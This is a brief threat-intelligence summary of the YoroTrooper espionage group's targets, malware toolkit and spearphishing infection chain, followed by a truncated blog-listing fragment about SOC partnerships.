A threat actor identified as “YoroTrooper” has had several espionage campaigns attributed to it by Cisco Talos since June of 2022. YoroTrooper has targeted government and energy organizations in the Commonwealth of Independent States (CIS), a health care agency in the European Union and the World Intellectual Property Organization (WIPO). Due to the presence of Cyrillic characters in several of the implants that were used, Cisco Talos believes the group to be Russian-speaking. Their toolkit primarily consists of custom and open-source Python based information stealers such as the Stink Stealer which is compiled into an executable using tools like Pyinstaller. For remote access YoroTrooper primarily deployed commodity malware such as AveMaria, Warzone RAT, LodaRAT and Meterpreter. The infection chain uses spearphishing techniques to convince their victims to download a malicious archive file containing .LNK files. These link files download a malicious HTA file which loads the final dropper, starting the Python based stealer software.
12 Essentials for a Successful SOC Partnership
Binary Defense
January 12, 2023
As cyber threats continue to impact businesses of all sizes, the need for round-the-clock security
